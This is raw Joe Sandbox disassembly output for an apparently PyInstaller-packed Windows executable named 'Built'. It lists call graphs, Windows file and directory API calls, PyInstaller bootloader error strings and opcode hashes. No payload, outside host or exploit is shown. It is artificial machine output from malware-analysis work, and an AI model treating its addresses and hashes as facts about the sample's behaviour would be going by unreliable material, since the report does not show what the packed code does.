7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19364->19365 19365->19359 19367 7ff76d5d8417 19366->19367 19369 7ff76d5d8443 19366->19369 19370 7ff76d5d845c 19366->19370 19368 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19367->19368 19368->19359 19371 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19369->19371 19373 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19370->19373 19372 7ff76d5d844c 19371->19372 19374 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19372->19374 19373->19367 19374->19359 19377 7ff76d5cc2f6 19376->19377 19379 7ff76d5cc2ef 19376->19379 19380 7ff76d5d94fc 19377->19380 19379->19350 19383 7ff76d5d9138 19380->19383 19390 7ff76d5df5e8 EnterCriticalSection 19383->19390 19796 7ff76d5e09c0 19807 7ff76d5e66f4 19796->19807 19808 7ff76d5e6701 19807->19808 19809 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19808->19809 19810 7ff76d5e671d 19808->19810 19809->19808 19811 7ff76d5d9c58 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19810->19811 19812 7ff76d5e09c9 19810->19812 19811->19810 19813 7ff76d5df5e8 EnterCriticalSection 19812->19813 18973 7ff76d5d4938 18974 7ff76d5d496f 18973->18974 18975 7ff76d5d4952 18973->18975 18974->18975 18976 7ff76d5d4982 CreateFileW 18974->18976 18977 7ff76d5d43d4 _fread_nolock 11 API calls 18975->18977 18979 7ff76d5d49b6 18976->18979 18980 7ff76d5d49ec 18976->18980 18978 7ff76d5d4957 18977->18978 18981 7ff76d5d43f4 memcpy_s 11 API calls 18978->18981 18998 7ff76d5d4a8c GetFileType 18979->18998 19024 7ff76d5d4f14 18980->19024 18984 7ff76d5d495f 18981->18984 18987 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 18984->18987 18993 7ff76d5d496a 18987->18993 18988 7ff76d5d49e1 CloseHandle 18988->18993 18989 7ff76d5d49cb CloseHandle 18989->18993 18990 7ff76d5d49f5 18992 7ff76d5d4368 _fread_nolock 11 API calls 18990->18992 18991 7ff76d5d4a20 19045 7ff76d5d4cd4 18991->19045 18997 7ff76d5d49ff 18992->18997 18997->18993 18999 7ff76d5d4b97 18998->18999 19000 7ff76d5d4ada 18998->19000 19002 7ff76d5d4b9f 18999->19002 19003 7ff76d5d4bc1 18999->19003 19001 7ff76d5d4b06 GetFileInformationByHandle 19000->19001 19004 7ff76d5d4e10 21 API calls 19000->19004 19005 7ff76d5d4b2f 19001->19005 19006 7ff76d5d4bb2 GetLastError 19001->19006 19002->19006 19007 7ff76d5d4ba3 19002->19007 19008 7ff76d5d4be4 PeekNamedPipe 19003->19008 19023 7ff76d5d4b82 19003->19023 19013 7ff76d5d4af4 19004->19013 19009 7ff76d5d4cd4 51 API calls 19005->19009 19011 7ff76d5d4368 _fread_nolock 11 API calls 19006->19011 19010 7ff76d5d43f4 memcpy_s 11 API calls 19007->19010 19008->19023 19014 7ff76d5d4b3a 19009->19014 19010->19023 19011->19023 19012 7ff76d5cb870 _log10_special 8 API calls 19015 7ff76d5d49c4 19012->19015 19013->19001 19013->19023 19062 7ff76d5d4c34 19014->19062 19015->18988 19015->18989 19018 7ff76d5d4c34 10 API calls 19019 7ff76d5d4b59 19018->19019 19020 7ff76d5d4c34 10 API calls 19019->19020 19021 7ff76d5d4b6a 19020->19021 19022 7ff76d5d43f4 memcpy_s 11 API calls 19021->19022 19021->19023 19022->19023 19023->19012 19025 7ff76d5d4f4a 19024->19025 19026 7ff76d5d43f4 memcpy_s 11 API calls 19025->19026 19044 7ff76d5d4fe2 __vcrt_freefls 19025->19044 19027 7ff76d5d4f5c 19026->19027 19030 7ff76d5d43f4 memcpy_s 11 API calls 19027->19030 19028 7ff76d5cb870 _log10_special 8 API calls 19029 7ff76d5d49f1 19028->19029 19029->18990 19029->18991 19031 7ff76d5d4f64 19030->19031 19032 7ff76d5d7118 45 API calls 19031->19032 19033 7ff76d5d4f79 19032->19033 19034 7ff76d5d4f81 19033->19034 19035 7ff76d5d4f8b 19033->19035 19036 7ff76d5d43f4 memcpy_s 11 API calls 19034->19036 19037 7ff76d5d43f4 memcpy_s 11 API calls 19035->19037 19040 7ff76d5d4f86 19036->19040 19038 7ff76d5d4f90 19037->19038 19039 7ff76d5d43f4 memcpy_s 11 API calls 19038->19039 19038->19044 19041 7ff76d5d4f9a 19039->19041 19042 7ff76d5d4fd4 GetDriveTypeW 19040->19042 19040->19044 19043 7ff76d5d7118 45 API calls 19041->19043 19042->19044 19043->19040 19044->19028 19047 7ff76d5d4cfc 19045->19047 19046 7ff76d5d4a2d 19055 7ff76d5d4e10 19046->19055 19047->19046 19069 7ff76d5dea34 19047->19069 19049 7ff76d5d4d90 19049->19046 19050 7ff76d5dea34 51 API calls 19049->19050 19051 7ff76d5d4da3 19050->19051 19051->19046 19052 7ff76d5dea34 51 API calls 19051->19052 19053 7ff76d5d4db6 19052->19053 19053->19046 19054 7ff76d5dea34 51 API calls 19053->19054 19054->19046 19056 7ff76d5d4e2a 19055->19056 19057 7ff76d5d4e61 19056->19057 19058 7ff76d5d4e3a 19056->19058 19059 7ff76d5de8c8 21 API calls 19057->19059 19060 7ff76d5d4368 _fread_nolock 11 API calls 19058->19060 19061 7ff76d5d4e4a 19058->19061 19059->19061 19060->19061 19061->18997 19063 7ff76d5d4c50 19062->19063 19064 7ff76d5d4c5d FileTimeToSystemTime 19062->19064 19063->19064 19066 7ff76d5d4c58 19063->19066 19065 7ff76d5d4c71 SystemTimeToTzSpecificLocalTime 19064->19065 19064->19066 19065->19066 19067 7ff76d5cb870 _log10_special 8 API calls 19066->19067 19068 7ff76d5d4b49 19067->19068 19068->19018 19070 7ff76d5dea41 19069->19070 19073 7ff76d5dea65 19069->19073 19071 7ff76d5dea46 19070->19071 19070->19073 19072 7ff76d5d43f4 memcpy_s 11 API calls 19071->19072 19077 7ff76d5dea4b 19072->19077 19074 7ff76d5dea9f 19073->19074 19076 7ff76d5deabe 19073->19076 19075 7ff76d5d43f4 memcpy_s 11 API calls 19074->19075 19078 7ff76d5deaa4 19075->19078 19079 7ff76d5d4178 45 API calls 19076->19079 19080 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19077->19080 19081 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19078->19081 19085 7ff76d5deacb 19079->19085 19082 7ff76d5dea56 19080->19082 19084 7ff76d5deaaf 19081->19084 19082->19049 19083 7ff76d5df7ec 51 API calls 19083->19085 19084->19049 19085->19083 19085->19084 19502 7ff76d5d4720 19503 7ff76d5d472b 19502->19503 19511 7ff76d5de5b4 19503->19511 19524 7ff76d5df5e8 EnterCriticalSection 19511->19524 19891 7ff76d5dec9c 19892 7ff76d5dee8e 19891->19892 19894 7ff76d5decde _isindst 19891->19894 19893 7ff76d5d43f4 memcpy_s 11 API calls 19892->19893 19911 7ff76d5dee7e 19893->19911 19894->19892 19897 7ff76d5ded5e _isindst 19894->19897 19895 7ff76d5cb870 _log10_special 8 API calls 19896 7ff76d5deea9 19895->19896 19912 7ff76d5e54a4 19897->19912 19902 7ff76d5deeba 19904 7ff76d5d9c10 _isindst 17 API calls 19902->19904 19906 7ff76d5deece 19904->19906 19909 7ff76d5dedbb 19909->19911 19937 7ff76d5e54e8 19909->19937 19911->19895 19913 7ff76d5e54b3 19912->19913 19914 7ff76d5ded7c 19912->19914 19944 7ff76d5df5e8 EnterCriticalSection 19913->19944 19919 7ff76d5e48a8 19914->19919 19920 7ff76d5e48b1 19919->19920 19922 7ff76d5ded91 19919->19922 19921 7ff76d5d43f4 memcpy_s 11 API calls 19920->19921 19923 7ff76d5e48b6 19921->19923 19922->19902 19925 7ff76d5e48d8 19922->19925 19924 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19923->19924 19924->19922 19926 7ff76d5e48e1 19925->19926 19927 7ff76d5deda2 19925->19927 19928 7ff76d5d43f4 memcpy_s 11 API calls 19926->19928 19927->19902 19931 7ff76d5e4908 19927->19931 19929 7ff76d5e48e6 19928->19929 19930 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19929->19930 19930->19927 19932 7ff76d5e4911 19931->19932 19933 7ff76d5dedb3 19931->19933 19934 7ff76d5d43f4 memcpy_s 11 API calls 19932->19934 19933->19902 19933->19909 19935 7ff76d5e4916 19934->19935 19936 7ff76d5d9bf0 _invalid_parameter_noinfo 37 API calls 19935->19936 19936->19933 19945 7ff76d5df5e8 EnterCriticalSection 19937->19945 19557 7ff76d5db830 19568 7ff76d5df5e8 EnterCriticalSection 19557->19568

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 7ff76d5c1000-7ff76d5c3536 call 7ff76d5cf138 call 7ff76d5cf140 call 7ff76d5cbb70 call 7ff76d5d4700 call 7ff76d5d4794 call 7ff76d5c33e0 14 7ff76d5c3544-7ff76d5c3566 call 7ff76d5c18f0 0->14 15 7ff76d5c3538-7ff76d5c353f 0->15 20 7ff76d5c3736-7ff76d5c374c call 7ff76d5c3f70 14->20 21 7ff76d5c356c-7ff76d5c3583 call 7ff76d5c1bf0 14->21 16 7ff76d5c371a-7ff76d5c3735 call 7ff76d5cb870 15->16 29 7ff76d5c3785-7ff76d5c379a call 7ff76d5c25f0 20->29 30 7ff76d5c374e-7ff76d5c377b call 7ff76d5c76a0 20->30 25 7ff76d5c3588-7ff76d5c35c1 21->25 27 7ff76d5c3653-7ff76d5c366d call 7ff76d5c7e10 25->27 28 7ff76d5c35c7-7ff76d5c35cb 25->28 44 7ff76d5c366f-7ff76d5c3675 27->44 45 7ff76d5c3695-7ff76d5c369c 27->45 33 7ff76d5c3638-7ff76d5c364d call 7ff76d5c18e0 28->33 34 7ff76d5c35cd-7ff76d5c35e5 call 7ff76d5d4560 28->34 47 7ff76d5c3712 29->47 41 7ff76d5c379f-7ff76d5c37be call 7ff76d5c1bf0 30->41 42 7ff76d5c377d-7ff76d5c3780 call 7ff76d5cf36c 30->42 33->27 33->28 52 7ff76d5c35f2-7ff76d5c360a call 7ff76d5d4560 34->52 53 7ff76d5c35e7-7ff76d5c35eb 34->53 62 7ff76d5c37c1-7ff76d5c37ca 41->62 42->29 50 7ff76d5c3682-7ff76d5c3690 call 7ff76d5d415c 44->50 51 7ff76d5c3677-7ff76d5c3680 44->51 54 7ff76d5c36a2-7ff76d5c36c0 call 7ff76d5c7e10 call 7ff76d5c7f80 45->54 55 7ff76d5c3844-7ff76d5c3863 call 7ff76d5c3e90 45->55 47->16 50->45 51->50 68 7ff76d5c3617-7ff76d5c362f call 7ff76d5d4560 52->68 69 7ff76d5c360c-7ff76d5c3610 52->69 53->52 76 7ff76d5c380f-7ff76d5c381e call 7ff76d5c8400 54->76 77 7ff76d5c36c6-7ff76d5c36c9 54->77 65 7ff76d5c3871-7ff76d5c3882 call 7ff76d5c1bf0 55->65 66 7ff76d5c3865-7ff76d5c386f call 7ff76d5c3fe0 55->66 62->62 67 7ff76d5c37cc-7ff76d5c37e9 call 7ff76d5c18f0 62->67 79 7ff76d5c3887-7ff76d5c38a1 call 7ff76d5c86b0 65->79 66->79 67->25 86 7ff76d5c37ef-7ff76d5c3800 call 7ff76d5c25f0 67->86 68->33 82 7ff76d5c3631 68->82 69->68 93 7ff76d5c3820 76->93 94 7ff76d5c382c-7ff76d5c382f call 7ff76d5c7c40 76->94 77->76 83 7ff76d5c36cf-7ff76d5c36f6 call 7ff76d5c1bf0 77->83 95 7ff76d5c38af-7ff76d5c38c1 SetDllDirectoryW 79->95 96 7ff76d5c38a3 79->96 82->33 97 7ff76d5c3805-7ff76d5c380d call 7ff76d5d415c 83->97 98 7ff76d5c36fc-7ff76d5c3703 call 7ff76d5c25f0 83->98 86->47 93->94 104 7ff76d5c3834-7ff76d5c3836 94->104 100 7ff76d5c38d0-7ff76d5c38ec call 7ff76d5c6560 call 7ff76d5c6b00 95->100 101 7ff76d5c38c3-7ff76d5c38ca 95->101 96->95 97->79 108 7ff76d5c3708-7ff76d5c370a 98->108 117 7ff76d5c3947-7ff76d5c394a call 7ff76d5c6510 100->117 118 7ff76d5c38ee-7ff76d5c38f4 100->118 101->100 105 7ff76d5c3a50-7ff76d5c3a58 101->105 104->79 111 7ff76d5c3838 104->111 109 7ff76d5c3a5a-7ff76d5c3a77 PostMessageW GetMessageW 105->109 110 7ff76d5c3a7d-7ff76d5c3aaf call 7ff76d5c33d0 call 7ff76d5c3080 call 7ff76d5c33a0 call 7ff76d5c6780 call 7ff76d5c6510 105->110 108->47 109->110 111->55 125 7ff76d5c394f-7ff76d5c3956 117->125 120 7ff76d5c38f6-7ff76d5c3903 call 7ff76d5c65a0 118->120 121 7ff76d5c390e-7ff76d5c3918 call 7ff76d5c6970 118->121 120->121 133 7ff76d5c3905-7ff76d5c390c 120->133 135 7ff76d5c3923-7ff76d5c3931 call 7ff76d5c6cd0 121->135 136 7ff76d5c391a-7ff76d5c3921 121->136 125->105 130 7ff76d5c395c-7ff76d5c3966 call 7ff76d5c30e0 125->130 130->108 143 7ff76d5c396c-7ff76d5c3980 call 7ff76d5c83e0 130->143 138 7ff76d5c393a-7ff76d5c3942 call 7ff76d5c2870 call 7ff76d5c6780 133->138 135->125 148 7ff76d5c3933 135->148 136->138 138->117 151 7ff76d5c3982-7ff76d5c399f PostMessageW GetMessageW 143->151 152 7ff76d5c39a5-7ff76d5c39e1 call 7ff76d5c7f20 call 7ff76d5c7fc0 call 7ff76d5c6780 call 7ff76d5c6510 call 7ff76d5c7ec0 143->152 148->138 151->152 162 7ff76d5c39e6-7ff76d5c39e8 152->162 163 7ff76d5c39ea-7ff76d5c3a00 call 7ff76d5c81f0 call 7ff76d5c7ec0 162->163 164 7ff76d5c3a3d-7ff76d5c3a4b call 7ff76d5c18a0 162->164 163->164 171 7ff76d5c3a02-7ff76d5c3a10 163->171 164->108 172 7ff76d5c3a12-7ff76d5c3a2c call 7ff76d5c25f0 call 7ff76d5c18a0 171->172 173 7ff76d5c3a31-7ff76d5c3a38 call 7ff76d5c2870 171->173 172->108 173->164
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleName
                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                                      • API String ID: 514040917-1099759049
                                                                      • Opcode ID: f063c1712e87279c77d8887c1389ef7552d407f6137c2a3eae29b16cd546fbe9
                                                                      • Instruction ID: c99c8860e0fdac09ed77b146a73fd7f673d5fddab605377982c504a4ebb6e327
                                                                      • Opcode Fuzzy Hash: f063c1712e87279c77d8887c1389ef7552d407f6137c2a3eae29b16cd546fbe9
                                                                      • Instruction Fuzzy Hash: 96F15921A2C786D1FB19FB21D5542B9A2A1AF58780FC4403ADE1D43A97FF2CE558CB70

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 335 7ff76d5e5c74-7ff76d5e5ce7 call 7ff76d5e59a8 338 7ff76d5e5d01-7ff76d5e5d0b call 7ff76d5d7830 335->338 339 7ff76d5e5ce9-7ff76d5e5cf2 call 7ff76d5d43d4 335->339 344 7ff76d5e5d26-7ff76d5e5d8f CreateFileW 338->344 345 7ff76d5e5d0d-7ff76d5e5d24 call 7ff76d5d43d4 call 7ff76d5d43f4 338->345 346 7ff76d5e5cf5-7ff76d5e5cfc call 7ff76d5d43f4 339->346 348 7ff76d5e5d91-7ff76d5e5d97 344->348 349 7ff76d5e5e0c-7ff76d5e5e17 GetFileType 344->349 345->346 357 7ff76d5e6042-7ff76d5e6062 346->357 354 7ff76d5e5dd9-7ff76d5e5e07 GetLastError call 7ff76d5d4368 348->354 355 7ff76d5e5d99-7ff76d5e5d9d 348->355 351 7ff76d5e5e6a-7ff76d5e5e71 349->351 352 7ff76d5e5e19-7ff76d5e5e54 GetLastError call 7ff76d5d4368 CloseHandle 349->352 360 7ff76d5e5e73-7ff76d5e5e77 351->360 361 7ff76d5e5e79-7ff76d5e5e7c 351->361 352->346 369 7ff76d5e5e5a-7ff76d5e5e65 call 7ff76d5d43f4 352->369 354->346 355->354 362 7ff76d5e5d9f-7ff76d5e5dd7 CreateFileW 355->362 366 7ff76d5e5e82-7ff76d5e5ed7 call 7ff76d5d7748 360->366 361->366 367 7ff76d5e5e7e 361->367 362->349 362->354 374 7ff76d5e5ef6-7ff76d5e5f27 call 7ff76d5e5728 366->374 375 7ff76d5e5ed9-7ff76d5e5ee5 call 7ff76d5e5bb0 366->375 367->366 369->346 381 7ff76d5e5f2d-7ff76d5e5f6f 374->381 382 7ff76d5e5f29-7ff76d5e5f2b 374->382 375->374 380 7ff76d5e5ee7 375->380 383 7ff76d5e5ee9-7ff76d5e5ef1 call 7ff76d5d9dd0 380->383 384 7ff76d5e5f91-7ff76d5e5f9c 381->384 385 7ff76d5e5f71-7ff76d5e5f75 381->385 382->383 383->357 388 7ff76d5e6040 384->388 389 7ff76d5e5fa2-7ff76d5e5fa6 384->389 385->384 387 7ff76d5e5f77-7ff76d5e5f8c 385->387 387->384 388->357 389->388 391 7ff76d5e5fac-7ff76d5e5ff1 CloseHandle CreateFileW 389->391 392 7ff76d5e5ff3-7ff76d5e6021 GetLastError call 7ff76d5d4368 call 7ff76d5d7970 391->392 393 7ff76d5e6026-7ff76d5e603b 391->393 392->393 393->388
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                      • String ID:
                                                                      • API String ID: 1617910340-0
                                                                      • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                      • Instruction ID: f4dcd9222a0f64b4a608c99ab80cf2d788be897eb611c508f1a7bb86715073c0
                                                                      • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                      • Instruction Fuzzy Hash: 94C1C336B28A45C6EB10EF68C4902BC7761FB49B98B811235DF2E57B96EF38D551C320

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • FindFirstFileW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A1B
                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7A9E
                                                                      • DeleteFileW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ABD
                                                                      • FindNextFileW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ACB
                                                                      • FindClose.KERNEL32(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7ADC
                                                                      • RemoveDirectoryW.KERNELBASE(?,00007FF76D5C7EF9,00007FF76D5C39E6), ref: 00007FF76D5C7AE5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                      • String ID: %s\*
                                                                      • API String ID: 1057558799-766152087
                                                                      • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                      • Instruction ID: 4d27f3747f592dbf4448ab11a96f07e34a2859e872720d56c8b21394b52ae8b4
                                                                      • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                      • Instruction Fuzzy Hash: 06416321E2CA42D5EB30BB24E8445B9A361FB98754FC40636DD5D42E96FF3CD64A8B30
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                      • Instruction ID: ec88b6fe75d1f8700bdab4c2eca9bc2c93fb35243e69a3d215c5a16718a7ef72
                                                                      • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                      • Instruction Fuzzy Hash: 33F0A422A2C741C6F760AF60B488366B350AB44328F840239DD7E02AD5EF3CD058CE14
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                      • String ID:
                                                                      • API String ID: 1010374628-0
                                                                      • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                      • Instruction ID: 6235351fb741558fdafd24541fb94a9e81359862d284f445068b45daca4f5b01
                                                                      • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                      • Instruction Fuzzy Hash: 2D02CF21E3D683C4FA65BB1AA820279A780AF59B90FC44635DD7D46BD3FE7DA4018334

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 179 7ff76d5c18f0-7ff76d5c192b call 7ff76d5c3f70 182 7ff76d5c1bc1-7ff76d5c1be5 call 7ff76d5cb870 179->182 183 7ff76d5c1931-7ff76d5c1971 call 7ff76d5c76a0 179->183 188 7ff76d5c1977-7ff76d5c1987 call 7ff76d5cf9f4 183->188 189 7ff76d5c1bae-7ff76d5c1bb1 call 7ff76d5cf36c 183->189 194 7ff76d5c19a1-7ff76d5c19bd call 7ff76d5cf6bc 188->194 195 7ff76d5c1989-7ff76d5c199c call 7ff76d5c2760 188->195 193 7ff76d5c1bb6-7ff76d5c1bbe 189->193 193->182 200 7ff76d5c19bf-7ff76d5c19d2 call 7ff76d5c2760 194->200 201 7ff76d5c19d7-7ff76d5c19ec call 7ff76d5d4154 194->201 195->189 200->189 206 7ff76d5c1a06-7ff76d5c1a87 call 7ff76d5c1bf0 * 2 call 7ff76d5cf9f4 201->206 207 7ff76d5c19ee-7ff76d5c1a01 call 7ff76d5c2760 201->207 215 7ff76d5c1a8c-7ff76d5c1a9f call 7ff76d5d4170 206->215 207->189 218 7ff76d5c1aa1-7ff76d5c1ab4 call 7ff76d5c2760 215->218 219 7ff76d5c1ab9-7ff76d5c1ad2 call 7ff76d5cf6bc 215->219 218->189 224 7ff76d5c1ad4-7ff76d5c1ae7 call 7ff76d5c2760 219->224 225 7ff76d5c1aec-7ff76d5c1b08 call 7ff76d5cf430 219->225 224->189 230 7ff76d5c1b0a-7ff76d5c1b16 call 7ff76d5c25f0 225->230 231 7ff76d5c1b1b-7ff76d5c1b29 225->231 230->189 231->189 233 7ff76d5c1b2f-7ff76d5c1b3e 231->233 235 7ff76d5c1b40-7ff76d5c1b46 233->235 236 7ff76d5c1b60-7ff76d5c1b6f 235->236 237 7ff76d5c1b48-7ff76d5c1b55 235->237 236->236 238 7ff76d5c1b71-7ff76d5c1b7a 236->238 237->238 239 7ff76d5c1b8f 238->239 240 7ff76d5c1b7c-7ff76d5c1b7f 238->240 242 7ff76d5c1b91-7ff76d5c1bac 239->242 240->239 241 7ff76d5c1b81-7ff76d5c1b84 240->241 241->239 243 7ff76d5c1b86-7ff76d5c1b89 241->243 242->189 242->235 243->239 244 7ff76d5c1b8b-7ff76d5c1b8d 243->244 244->242
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _fread_nolock$Message
                                                                      • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                      • API String ID: 677216364-3497178890
                                                                      • Opcode ID: 6fe09687227c44a11a2aea52fbca8833870d003cb7aa0180f1ca23ffa5452ddf
                                                                      • Instruction ID: af7b0739bf16475b14ff838075313ec0266d431c27592a6456d0ae0be2933662
